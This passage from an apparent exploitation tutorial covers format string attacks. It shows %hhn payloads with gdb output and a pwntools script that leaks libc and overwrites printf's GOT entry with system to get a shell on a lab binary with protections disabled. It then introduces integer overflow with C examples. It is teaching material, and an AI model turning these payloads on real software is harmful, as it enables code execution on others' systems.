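The three results can be reproduced with simple masking. The sketch below models a little-endian 32-bit word and shows which bytes each modifier replaces; the helper name apply_write is hypothetical, and only the three modifiers tried above are modeled.

```python
# Number of bytes each conversion stores.
SIZES = {"hhn": 1, "hn": 2, "n": 4}

def apply_write(old: int, count: int, modifier: str) -> int:
    """Overwrite the low bytes of a 32-bit little-endian word as %hhn/%hn/%n would."""
    bits = 8 * SIZES[modifier]
    mask = (1 << bits) - 1
    # Keep the untouched high bytes, replace the low ones with count (truncated).
    return (old & ~mask & 0xffffffff) | (count & mask)

for modifier in ("hhn", "hn", "n"):
    print(modifier, hex(apply_write(0x88888888, 1, modifier)))
```

Because the count is truncated to the written size, a count of 0x312 stored through %hhn leaves 0x12 in the target byte, which is what makes byte-by-byte writes of large values possible.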

So we can overwrite one byte at a time, which saves a great deal of space. Let's try writing 0x12345678 to address 0xffffd538, starting with AAAABBBBCCCCDDDD as input:

gdb-peda$ r
AAAABBBBCCCCDDDD
[----------------------------------registers-----------------------------------]
EAX: 0xffffd564 ("AAAABBBBCCCCDDDD")
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd52c --> 0x8048520 (<main+138>:      add    esp,0x20)
EIP: 0xf7e27c20 (<printf>:      call   0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7e27c1b <fprintf+27>:     ret
   0xf7e27c1c:  xchg   ax,ax
   0xf7e27c1e:  xchg   ax,ax
=> 0xf7e27c20 <printf>: call   0xf7f06d17 <__x86.get_pc_thunk.ax>
   0xf7e27c25 <printf+5>:       add    eax,0x16f243
   0xf7e27c2a <printf+10>:      sub    esp,0xc
   0xf7e27c2d <printf+13>:      mov    eax,DWORD PTR [eax+0x124]
   0xf7e27c33 <printf+19>:      lea    edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd52c --> 0x8048520 (<main+138>:     add    esp,0x20)
0004| 0xffffd530 --> 0xffffd564 ("AAAABBBBCCCCDDDD")
0008| 0xffffd534 --> 0x1
0012| 0xffffd538 --> 0x88888888
0016| 0xffffd53c --> 0xffffffff
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
0024| 0xffffd544 --> 0xffffd564 ("AAAABBBBCCCCDDDD")
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20x $esp
0xffffd52c:     0x08048520      0xffffd564      0x00000001      0x88888888
0xffffd53c:     0xffffffff      0xffffd55a      0xffffd564      0x080481fc
0xffffd54c:     0x080484b0      0xf7ffda54      0x00000001      0x424135d0
0xffffd55c:     0x00004443      0x00000000      0x41414141      0x42424242
0xffffd56c:     0x43434343      0x44444444      0x00000000      0x000000c2
gdb-peda$ x/4wb 0xffffd538
0xffffd538:     0x88    0x88    0x88    0x88

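Since we want to overwrite byte by byte, we need 4 stack slots to hold the pointers, 4 target addresses and 4 values. They correspond as follows (little-endian):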

0xffffd564 -> 0x41414141 (0xffffd538) -> \x78
0xffffd568 -> 0x42424242 (0xffffd539) -> \x56
0xffffd56c -> 0x43434343 (0xffffd53a) -> \x34
0xffffd570 -> 0x44444444 (0xffffd53b) -> \x12

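Replace the slots occupied by AAAA, BBBB, CCCC and DDDD with the values in parentheses, then add padding bytes as needed to keep everything aligned to 8 bytes. The input is built as follows: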

$ python2 -c 'print("\x38\xd5\xff\xff"+"\x39\xd5\xff\xff"+"\x3a\xd5\xff\xff"+"\x3b\xd5\xff\xff"+"%104c%13$hhn"+"%222c%14$hhn"+"%222c%15$hhn"+"%222c%16$hhn")' > text

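The first four parts are the 4 target addresses, taking 4*4=16 bytes. The last four parts each write one hexadecimal byte. Because the hh modifier is used, only the low byte of the running count is kept: 0x78 (16+104=120 -> 0x78), 0x56 (120+222=342 -> 0x0156 -> 0x56), 0x34 (342+222=564 -> 0x0234 -> 0x34) and 0x12 (564+222=786 -> 0x312 -> 0x12). The result of running it: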

$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf  
Breakpoint 1 at 0x8048350
gdb-peda$ r < text  
Starting program: /home/firmy/Desktop/RE4B/a.out < text
[----------------------------------registers-----------------------------------]
EAX: 0xffffd564 --> 0xffffd538 --> 0x88888888
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd52c --> 0x8048520 (<main+138>:      add    esp,0x20)
EIP: 0xf7e27c20 (<printf>:      call   0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7e27c1b <fprintf+27>:     ret
   0xf7e27c1c:  xchg   ax,ax
   0xf7e27c1e:  xchg   ax,ax
=> 0xf7e27c20 <printf>: call   0xf7f06d17 <__x86.get_pc_thunk.ax>
   0xf7e27c25 <printf+5>:       add    eax,0x16f243
   0xf7e27c2a <printf+10>:      sub    esp,0xc
   0xf7e27c2d <printf+13>:      mov    eax,DWORD PTR [eax+0x124]
   0xf7e27c33 <printf+19>:      lea    edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd52c --> 0x8048520 (<main+138>:     add    esp,0x20)
0004| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
0008| 0xffffd534 --> 0x1
0012| 0xffffd538 --> 0x88888888
0016| 0xffffd53c --> 0xffffffff
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
0024| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20x $esp  
0xffffd52c:     0x08048520      0xffffd564      0x00000001      0x88888888
0xffffd53c:     0xffffffff      0xffffd55a      0xffffd564      0x080481fc
0xffffd54c:     0x080484b0      0xf7ffda54      0x00000001      0x424135d0
0xffffd55c:     0x00004443      0x00000000      0xffffd538      0xffffd539
0xffffd56c:     0xffffd53a      0xffffd53b      0x34303125      0x33312563
gdb-peda$ finish
Run till exit from #0  0xf7e27c20 in printf () from /usr/lib32/libc.so.6
[----------------------------------registers-----------------------------------]
EAX: 0x312
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x0
EDX: 0xf7f98830 --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
EIP: 0x8048520 (<main+138>:     add    esp,0x20)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048514 <main+126>:        lea    eax,[ebp-0x94]
   0x804851a <main+132>:        push   eax
   0x804851b <main+133>:        call   0x8048350 <printf@plt>
=> 0x8048520 <main+138>:        add    esp,0x20
   0x8048523 <main+141>:        sub    esp,0xc
   0x8048526 <main+144>:        push   0xa
   0x8048528 <main+146>:        call   0x8048370 <putchar@plt>
   0x804852d <main+151>:        add    esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
0004| 0xffffd534 --> 0x1
0008| 0xffffd538 --> 0x12345678
0012| 0xffffd53c --> 0xffffffff
0016| 0xffffd540 --> 0xffffd55a ("ABCD")
0020| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
0028| 0xffffd54c --> 0x80484b0 (<main+26>:      add    ebx,0x1b50)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048520 in main ()
gdb-peda$ x/20x $esp
0xffffd530:     0xffffd564      0x00000001      0x12345678      0xffffffff
0xffffd540:     0xffffd55a      0xffffd564      0x080481fc      0x080484b0
0xffffd550:     0xf7ffda54      0x00000001      0x424135d0      0x00004443
0xffffd560:     0x00000000      0xffffd538      0xffffd539      0xffffd53a
0xffffd570:     0xffffd53b      0x34303125      0x33312563      0x6e686824
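The padding values 104, 222, 222 and 222 follow mechanically from the running character count, so the whole payload can be generated. The Python 3 sketch below assumes a 32-bit little-endian target and that the four addresses sit at the start of the buffer, beginning at argument first_index; the name build_bytewise_write is hypothetical.

```python
import struct

def build_bytewise_write(address: int, value: int, first_index: int) -> bytes:
    """Four addresses, then four %Nc%M$hhn pairs that write `value` byte by byte."""
    addresses = b"".join(struct.pack("<I", address + i) for i in range(4))
    written = len(addresses)                     # 16 characters already output
    specs = []
    for i, target in enumerate(struct.pack("<I", value)):
        # %hhn keeps only the count modulo 256; a pad of 0 is replaced by 256
        # because %0c would still print one character.
        pad = (target - written) % 256 or 256
        specs.append("%{}c%{}$hhn".format(pad, first_index + i))
        written += pad
    return addresses + "".join(specs).encode()

payload = build_bytewise_write(0xffffd538, 0x12345678, 13)
print(payload)
```

With these arguments the function reproduces the input written to text above.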

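Finally, two points deserve emphasis:

First, ASLR has to be disabled system-wide. This guarantees that the stack stays at the same address from run to run, both under gdb and when the program is run directly, although the two addresses are not necessarily equal to each other.
Second, because stack addresses under gdb differ from those of a direct run, we need to use the format string vulnerability to read memory first, leak an address, and then compute the real addresses from the leaked one.

Format String Vulnerabilities on x86-64

On x64, most calling conventions pass arguments in registers. On Linux, the first six integer arguments are passed in RDI, RSI, RDX, RCX, R8 and R9; on Windows, the first four are passed in RCX, RDX, R8 and R9.

This is the same program as above, but this time we compile it as 64-bit: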

$ gcc -fno-stack-protector -no-pie fmt.c

Use AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p. as the input:

gdb-peda$ n
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0xffffffff
RDX: 0x88888888
RSI: 0x1
RDI: 0x7fffffffe3d0 ("AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.")
RBP: 0x7fffffffe460 --> 0x400660 (<__libc_csu_init>:    push   r15)
RSP: 0x7fffffffe3c0 --> 0x4241000000000000 ('')
RIP: 0x400648 (<main+113>:      call   0x4004e0 <printf@plt>)
R8 : 0x7fffffffe3c6 --> 0x44434241 ('ABCD')
R9 : 0xa ('\n')
R10: 0x7ffff7dd4380 --> 0x7ffff7dd0640 --> 0x7ffff7b9ed3a --> 0x636d656d5f5f0043 ('C')
R11: 0x246
R12: 0x400500 (<_start>:        xor    ebp,ebp)
R13: 0x7fffffffe540 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x40063d <main+102>: mov    r8,rdi
   0x400640 <main+105>: mov    rdi,rax
   0x400643 <main+108>: mov    eax,0x0
=> 0x400648 <main+113>: call   0x4004e0 <printf@plt>
   0x40064d <main+118>: mov    edi,0xa
   0x400652 <main+123>: call   0x4004d0 <putchar@plt>
   0x400657 <main+128>: nop
   0x400658 <main+129>: leave
Guessed arguments:
arg[0]: 0x7fffffffe3d0 ("AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0x7fffffffe3c6 --> 0x44434241 ('ABCD')
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe3c0 --> 0x4241000000000000 ('')
0008| 0x7fffffffe3c8 --> 0x4443 ('CD')
0016| 0x7fffffffe3d0 ("AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.")
0024| 0x7fffffffe3d8 ("%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.")
0032| 0x7fffffffe3e0 (".%p.%p.%p.%p.%p.%p.%p.")
0040| 0x7fffffffe3e8 ("p.%p.%p.%p.%p.")
0048| 0x7fffffffe3f0 --> 0x2e70252e7025 ('%p.%p.')
0056| 0x7fffffffe3f8 --> 0x1
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0000000000400648 in main ()
gdb-peda$ x/10g $rsp
0x7fffffffe3c0: 0x4241000000000000      0x0000000000004443
0x7fffffffe3d0: 0x4141414141414141      0x70252e70252e7025
0x7fffffffe3e0: 0x252e70252e70252e      0x2e70252e70252e70
0x7fffffffe3f0: 0x00002e70252e7025      0x0000000000000001
0x7fffffffe400: 0x0000000000f0b5ff      0x00000000000000c2
gdb-peda$ c
Continuing.
AAAAAAAA0x1.0x88888888.0xffffffff.0x7fffffffe3c6.0xa.0x4241000000000000.0x4443.0x4141414141414141.0x70252e70252e7025.0x252e70252e70252e.

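In the final output, the first five values come from the registers RSI, RDX, RCX, R8 and R9, and only the values after them are taken from the stack. 0x4141414141414141 is at the %8$p position. One more thing to note: we said earlier that Linux uses 6 registers to pass arguments, yet only 5 show up here. The reason is that one register, RDI, is used to pass the format string itself; gdb shows that arg[0] is the format string passed in RDI. (If you go back to the x86 material now, you will see that on x86 the format string is passed on the stack, but it is likewise not printed.) Everything else works much as it does on x86, except that we can no longer modify arg2, because it is held in a register.

Format String Vulnerabilities in CTFs

The pwntools pwnlib.fmtstr Module

Documentation: http://pwntools.readthedocs.io/en/stable/fmtstr.html

This module provides tools for exploiting format string vulnerabilities. It defines a class, FmtStr, and a function, fmtstr_payload.

FmtStr provides automated format string exploitation: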
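The mapping from a positional index to its source can be written down as a small lookup. The Python sketch below assumes the System V AMD64 convention used on Linux and integer or pointer arguments only (floating-point arguments travel in separate registers and are not modeled); the name arg_source is hypothetical.

```python
# Registers that carry printf's variadic integer arguments.
# RDI is absent because it holds the format string itself.
REGISTERS = ("RSI", "RDX", "RCX", "R8", "R9")

def arg_source(n: int):
    """Where printf finds the n-th argument (%n$p): a register or a stack offset."""
    if n < 1:
        raise ValueError("positional indexes start at 1")
    if n <= len(REGISTERS):
        return ("register", REGISTERS[n - 1])
    # Byte offset from RSP as it was just before the call instruction.
    return ("stack", 8 * (n - len(REGISTERS) - 1))

for n in (1, 5, 6, 8):
    print(n, arg_source(n))
```

For n = 8 the offset is 16, and RSP + 16 = 0x7fffffffe3d0 is exactly where gdb shows the AAAAAAAA bytes.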

class pwnlib.fmtstr.FmtStr(execute_fmt, offset=None, padlen=0, numbwritten=0)

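execute_fmt (function): the function that interacts with the vulnerable process
offset (int): the offset of the first formatter you control
padlen (int): the size of the pad to add before the payload
numbwritten (int): the number of bytes already written

fmtstr_payload automatically generates a format string payload: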

pwnlib.fmtstr.fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

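offset (int): the offset of the first formatter you control
writes (dict): a dict of the form {addr: value, addr2: value2}, used to write value to addr (a common target address is printf_got)
numbwritten (int): the number of bytes already written by the printf function
write_size (str): must be byte, short or int. It selects whether to write byte by byte, short by short or int by int (hhn, hn or n)

Let's get familiar with the module through an example (arbitrary memory read and write): fmt.c fmt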

#include <stdio.h>
#include <string.h>   /* memset */
#include <unistd.h>   /* read */
int main(void) {
    char str[1024];
    while(1) {
        memset(str, '\0', 1024);
        read(0, str, 1024);
        printf(str);
        fflush(stdout);
    }
}

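To keep things simple, we disable ASLR and compile with the command below, turning off PIE so that the memory addresses of the program's segments such as .text and .bss are fixed: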

# echo 0 > /proc/sys/kernel/randomize_va_space
$ gcc -m32 -fno-stack-protector -no-pie fmt.c

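The program obviously has a format string vulnerability. Our plan is to overwrite the GOT entry of printf() with the address of system(), so that when we next enter /bin/sh we get a shell.

The first step is to compute the offset. Although pwntools makes it easy to build the exploit, we first demonstrate how to do it by hand and use pwntools at the end. In gdb, set a breakpoint at main and run the program; at that point libc has already been loaded. Let's try entering "AAAA":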

gdb-peda$ b main
...
gdb-peda$ r
...
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd1f0 ("AAAA\n")
EBX: 0x804a000 --> 0x8049f10 --> 0x1
ECX: 0xffffd1f0 ("AAAA\n")
EDX: 0x400
ESI: 0xf7f97000 --> 0x1bbd90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd1e0 --> 0xffffd1f0 ("AAAA\n")
EIP: 0x8048512 (<main+92>:      call   0x8048370 <printf@plt>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048508 <main+82>: sub    esp,0xc
   0x804850b <main+85>: lea    eax,[ebp-0x408]
   0x8048511 <main+91>: push   eax
=> 0x8048512 <main+92>: call   0x8048370 <printf@plt>
   0x8048517 <main+97>: add    esp,0x10
   0x804851a <main+100>:        mov    eax,DWORD PTR [ebx-0x4]
   0x8048520 <main+106>:        mov    eax,DWORD PTR [eax]
   0x8048522 <main+108>:        sub    esp,0xc
Guessed arguments:
arg[0]: 0xffffd1f0 ("AAAA\n")
[------------------------------------stack-------------------------------------]
0000| 0xffffd1e0 --> 0xffffd1f0 ("AAAA\n")
0004| 0xffffd1e4 --> 0xffffd1f0 ("AAAA\n")
0008| 0xffffd1e8 --> 0x400
0012| 0xffffd1ec --> 0x80484d0 (<main+26>:      add    ebx,0x1b30)
0016| 0xffffd1f0 ("AAAA\n")
0020| 0xffffd1f4 --> 0xa ('\n')
0024| 0xffffd1f8 --> 0x0
0028| 0xffffd1fc --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048512 in main ()

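We see that the argument passed to printf(), arg[0]: 0xffffd1f0 ("AAAA\n"), sits on the 5th row of the stack. Excluding the first entry, which is the format string pointer itself, the offset is 4.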

Read the relocation table to get the GOT address of printf() (first column, Offset):

$ readelf -r a.out

Relocation section '.rel.dyn' at offset 0x2f4 contains 2 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
08049ff8  00000406 R_386_GLOB_DAT    00000000   __gmon_start__
08049ffc  00000706 R_386_GLOB_DAT    00000000   stdout@GLIBC_2.0

Relocation section '.rel.plt' at offset 0x304 contains 5 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a00c  00000107 R_386_JUMP_SLOT   00000000   read@GLIBC_2.0
0804a010  00000207 R_386_JUMP_SLOT   00000000   printf@GLIBC_2.0
0804a014  00000307 R_386_JUMP_SLOT   00000000   fflush@GLIBC_2.0
0804a018  00000507 R_386_JUMP_SLOT   00000000   __libc_start_main@GLIBC_2.0
0804a01c  00000607 R_386_JUMP_SLOT   00000000   memset@GLIBC_2.0

Get the virtual address of printf() in gdb:

gdb-peda$ p printf
$1 = {<text variable, no debug info>} 0xf7e26bf0 <printf>

Get the virtual address of system():

gdb-peda$ p system
$1 = {<text variable, no debug info>} 0xf7e17060 <system>

Having shown how to collect by hand the information needed to build the exploit, here is the complete exploit built with pwntools:

# -*- coding: utf-8 -*-
from pwn import *

elf = ELF('./a.out')
r = process('./a.out')
libc = ELF('/usr/lib32/libc.so.6')

# Compute the format string offset
def exec_fmt(payload):
    r.sendline(payload)
    info = r.recv()
    return info
auto = FmtStr(exec_fmt)
offset = auto.offset

# Get the GOT address of printf
printf_got = elf.got['printf']
log.success("printf_got => {}".format(hex(printf_got)))

# Leak the virtual address of printf
payload = p32(printf_got) + '%{}$s'.format(offset)
r.send(payload)
printf_addr = u32(r.recv()[4:8])
log.success("printf_addr => {}".format(hex(printf_addr)))

# Compute the virtual address of system from the distance between the two symbols in libc
system_addr = printf_addr - (libc.symbols['printf'] - libc.symbols['system'])
log.success("system_addr => {}".format(hex(system_addr)))

# Overwrite the GOT entry of printf with the address of system
payload = fmtstr_payload(offset, {printf_got : system_addr})
r.send(payload)
r.send('/bin/sh')
r.recv()
r.interactive()

$ python2 exp.py
[*] '/home/firmy/Desktop/RE4B/a.out'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Starting local process './a.out': pid 17375
[*] '/usr/lib32/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Found format string offset: 4
[+] printf_got => 0x804a010
[+] printf_addr => 0xf7e26bf0
[+] system_addr => 0xf7e17060
[*] Switching to interactive mode
$ echo "hacked!"
hacked!

We now have a shell, and the addresses printed by the script are exactly the ones we obtained by hand.
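To make the hhn write mode more concrete, the following Python 3 sketch lays out such a payload by hand for a 32-bit target. It is not the pwntools implementation: the helper name fmt_write_hhn is made up for illustration, and it assumes the payload starts exactly at the format string offset and that the target addresses contain no null bytes.

```python
import struct

def fmt_write_hhn(offset, addr, value):
    """Build a 32-bit format string payload that writes `value` to `addr` byte by byte."""
    # Four target addresses, one per byte; each occupies one stack slot.
    payload = b"".join(struct.pack("<I", addr + i) for i in range(4))
    written = len(payload)              # characters printed so far
    for i in range(4):
        byte = (value >> (8 * i)) & 0xFF
        pad = (byte - written) % 256    # extra characters needed so the count's low byte == byte
        if pad:
            payload += b"%%%dc" % pad
            written += pad
        payload += b"%%%d$hhn" % (offset + i)
    return payload

# Values from the walkthrough above: offset 4, printf GOT entry, address of system.
payload = fmt_write_hhn(4, 0x0804a010, 0xf7e17060)
print(payload)
```

Each %hhn stores only the low byte of the running character count, which is why the padding is computed modulo 256.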

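3.1.2 Integer Overflow

What Is Integer Overflow

Introduction

In the chapter on C basics we covered the fundamentals of C integers; here we look at integer security issues in detail.

An integer is stored in a fixed-size region of memory, so the largest and smallest values it can hold are fixed. If we try to store a number larger than that maximum, an integer overflow occurs. (The data model of x86-32 is ILP32: int, long, and pointers are all 32 bits.)

Dangers of Integer Overflow

If an integer is used to compute a sensitive value such as a buffer size or an array index, it becomes potentially dangerous. An integer overflow usually does not overwrite extra memory by itself and so does not directly lead to arbitrary code execution, but it can lead to stack and heap overflows, both of which can. Because an integer overflow is hard to notice right after it happens, it is difficult to reliably determine whether one has occurred or may occur.

Integer Overflow

There are three main kinds of abnormal integer behavior:

Overflow
- Only signed numbers overflow. The most significant bit of a signed number is the sign bit; adding two positive or two negative numbers may flip it, producing an overflow
- The overflow flag OF detects overflow of signed numbers
Wraparound
- For unsigned numbers, 0-1 becomes the largest value (255 for a 1-byte unsigned number), and 255+1 becomes the smallest value, 0.
- The carry flag CF detects wraparound of unsigned numbers
Truncation
- Storing a wider number into a narrower operand truncates the high bits

Signed Integer Overflow

Overflow past the maximum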

int i;
i = INT_MAX;  // 2 147 483 647
i++;
printf("i = %d\n", i);  // i = -2 147 483 648

Overflow past the minimum

i = INT_MIN;  // -2 147 483 648
i--;
printf("i = %d\n", i);  // i = 2 147 483 647

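Unsigned Wraparound

A computation involving unsigned operands can never overflow, because a result that cannot be represented by the resulting unsigned integer type is reduced modulo the number that is one greater than the largest value the type can represent. Because of wraparound, an unsigned integer expression can never evaluate to a value less than zero.

Wraparound can be pictured as a wheel of values: incrementing moves clockwise to the value right next to the current one, so stepping past the maximum lands on 0.

unsigned int ui;
ui = UINT_MAX;  // 4 294 967 295 on x86-32
ui++;
printf("ui = %u\n", ui);  // ui = 0
ui = 0;
ui--;
printf("ui = %u\n", ui);  // ui = 4 294 967 295 on x86-32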
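The signed and unsigned cases above can be reproduced in Python 3 with ctypes, whose fixed-width integer types keep only the low 32 bits of the value they are given, much like a 32-bit register. This is only a sketch of the arithmetic: in C itself, signed overflow is undefined behavior, and the wrapped results shown in the listings are what two's complement hardware such as x86 typically produces.

```python
import ctypes

INT_MAX = 2**31 - 1
INT_MIN = -2**31
UINT_MAX = 2**32 - 1

# ctypes does no overflow checking: out-of-range values are reduced to 32 bits.
overflow_up = ctypes.c_int32(INT_MAX + 1).value      # i = INT_MAX; i++
overflow_down = ctypes.c_int32(INT_MIN - 1).value    # i = INT_MIN; i--
wrap_up = ctypes.c_uint32(UINT_MAX + 1).value        # ui = UINT_MAX; ui++
wrap_down = ctypes.c_uint32(0 - 1).value             # ui = 0; ui--

print(overflow_up, overflow_down, wrap_up, wrap_down)
```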

Truncation

Truncation after addition:

0xffffffff + 0x00000001
= 0x0000000100000000 (long long)
= 0x00000000 (long)

Truncation after multiplication:

0x00123456 * 0x00654321
= 0x000007336BF94116 (long long)
= 0x6BF94116 (long)
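Both truncation results can be checked with a few lines of Python 3. Python integers have arbitrary precision, so the full result is available and a 32-bit mask models the store into a 32-bit variable. The helper name truncate32 is only illustrative.

```python
MASK32 = 0xFFFFFFFF

def truncate32(value):
    """Keep only the low 32 bits, as a store into a 32-bit variable would."""
    return value & MASK32

add_full = 0xffffffff + 0x00000001
mul_full = 0x00123456 * 0x00654321

print(hex(add_full), "->", hex(truncate32(add_full)))
print(hex(mul_full), "->", hex(truncate32(mul_full)))
```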

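Integer Promotion and Width Overflow

Integer promotion means that when an expression contains operands of different widths, the narrower operand is promoted to the width of the wider one before the computation is carried out. In C, operands narrower than int are first promoted to int, which is why s + c in the example is 32 bits wide.

Example: source code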

#include<stdio.h>
void main() {
    int l;
    short s;
    char c;

    l = 0xabcddcba;
    s = l;    // keeps only the low 16 bits
    c = l;    // keeps only the low 8 bits

    printf("Width overflow\n");
    printf("l = 0x%x (%d bits)\n", l, (int)(sizeof(l) * 8));
    printf("s = 0x%x (%d bits)\n", s, (int)(sizeof(s) * 8));
    printf("c = 0x%x (%d bits)\n", c, (int)(sizeof(c) * 8));

    printf("Integer promotion\n");
    printf("s + c = 0x%x (%d bits)\n", s+c, (int)(sizeof(s+c) * 8));
}

$ ./a.out
Width overflow
l = 0xabcddcba (32 bits)
s = 0xffffdcba (16 bits)
c = 0xffffffba (8 bits)
Integer promotion
s + c = 0xffffdc74 (32 bits)
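The printed values follow from sign extension: s and c are negative after truncation, so promoting them to int fills the upper bits with ones. A minimal Python 3 sketch of that arithmetic, with helper names chosen only for illustration:

```python
def sign_extend(value, bits):
    """Interpret the low `bits` bits of value as a two's complement signed number."""
    value &= (1 << bits) - 1
    sign = 1 << (bits - 1)
    return (value ^ sign) - sign

def as_u32(value):
    """Show a signed value the way printf's %x prints a 32-bit int."""
    return value & 0xFFFFFFFF

l = 0xabcddcba
s = sign_extend(l, 16)   # short s = l;
c = sign_extend(l, 8)    # char c = l;  (char is signed on x86)

print(hex(as_u32(s)), hex(as_u32(c)), hex(as_u32(s + c)))
```

This mirrors the movsx instructions in the disassembly, which sign-extend s and c to 32 bits before they are pushed or added.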

View the disassembly with gdb:

gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x0000056d <+0>:     lea    ecx,[esp+0x4]
   0x00000571 <+4>:     and    esp,0xfffffff0
   0x00000574 <+7>:     push   DWORD PTR [ecx-0x4]
   0x00000577 <+10>:    push   ebp
   0x00000578 <+11>:    mov    ebp,esp
   0x0000057a <+13>:    push   ebx
   0x0000057b <+14>:    push   ecx
   0x0000057c <+15>:    sub    esp,0x10
   0x0000057f <+18>:    call   0x470 <__x86.get_pc_thunk.bx>
   0x00000584 <+23>:    add    ebx,0x1a7c
   0x0000058a <+29>:    mov    DWORD PTR [ebp-0xc],0xabcddcba
   0x00000591 <+36>:    mov    eax,DWORD PTR [ebp-0xc]
   0x00000594 <+39>:    mov    WORD PTR [ebp-0xe],ax
   0x00000598 <+43>:    mov    eax,DWORD PTR [ebp-0xc]
   0x0000059b <+46>:    mov    BYTE PTR [ebp-0xf],al
   0x0000059e <+49>:    sub    esp,0xc
   0x000005a1 <+52>:    lea    eax,[ebx-0x1940]
   0x000005a7 <+58>:    push   eax
   0x000005a8 <+59>:    call   0x400 <puts@plt>
   0x000005ad <+64>:    add    esp,0x10
   0x000005b0 <+67>:    sub    esp,0x4
   0x000005b3 <+70>:    push   0x20
   0x000005b5 <+72>:    push   DWORD PTR [ebp-0xc]
   0x000005b8 <+75>:    lea    eax,[ebx-0x1933]
   0x000005be <+81>:    push   eax
   0x000005bf <+82>:    call   0x3f0 <printf@plt>
   0x000005c4 <+87>:    add    esp,0x10
   0x000005c7 <+90>:    movsx  eax,WORD PTR [ebp-0xe]
   0x000005cb <+94>:    sub    esp,0x4
   0x000005ce <+97>:    push   0x10
   0x000005d0 <+99>:    push   eax
   0x000005d1 <+100>:   lea    eax,[ebx-0x191f]
   0x000005d7 <+106>:   push   eax
   0x000005d8 <+107>:   call   0x3f0 <printf@plt>
   0x000005dd <+112>:   add    esp,0x10
   0x000005e0 <+115>:   movsx  eax,BYTE PTR [ebp-0xf]
   0x000005e4 <+119>:   sub    esp,0x4
   0x000005e7 <+122>:   push   0x8
   0x000005e9 <+124>:   push   eax
   0x000005ea <+125>:   lea    eax,[ebx-0x190b]
   0x000005f0 <+131>:   push   eax
   0x000005f1 <+132>:   call   0x3f0 <printf@plt>
   0x000005f6 <+137>:   add    esp,0x10
   0x000005f9 <+140>:   sub    esp,0xc
   0x000005fc <+143>:   lea    eax,[ebx-0x18f7]
   0x00000602 <+149>:   push   eax
   0x00000603 <+150>:   call   0x400 <puts@plt>
   0x00000608 <+155>:   add    esp,0x10
   0x0000060b <+158>:   movsx  edx,WORD PTR [ebp-0xe]
   0x0000060f <+162>:   movsx  eax,BYTE PTR [ebp-0xf]
   0x00000613 <+166>:   add    eax,edx
   0x00000615 <+168>:   sub    esp,0x4
   0x00000618 <+171>:   push   0x20
   0x0000061a <+173>:   push   eax
   0x0000061b <+174>:   lea    eax,[ebx-0x18ea]
   0x00000621 <+180>:   push   eax
   0x00000622 <+181>:   call   0x3f0 <printf@plt>
   0x00000627 <+186>:   add    esp,0x10
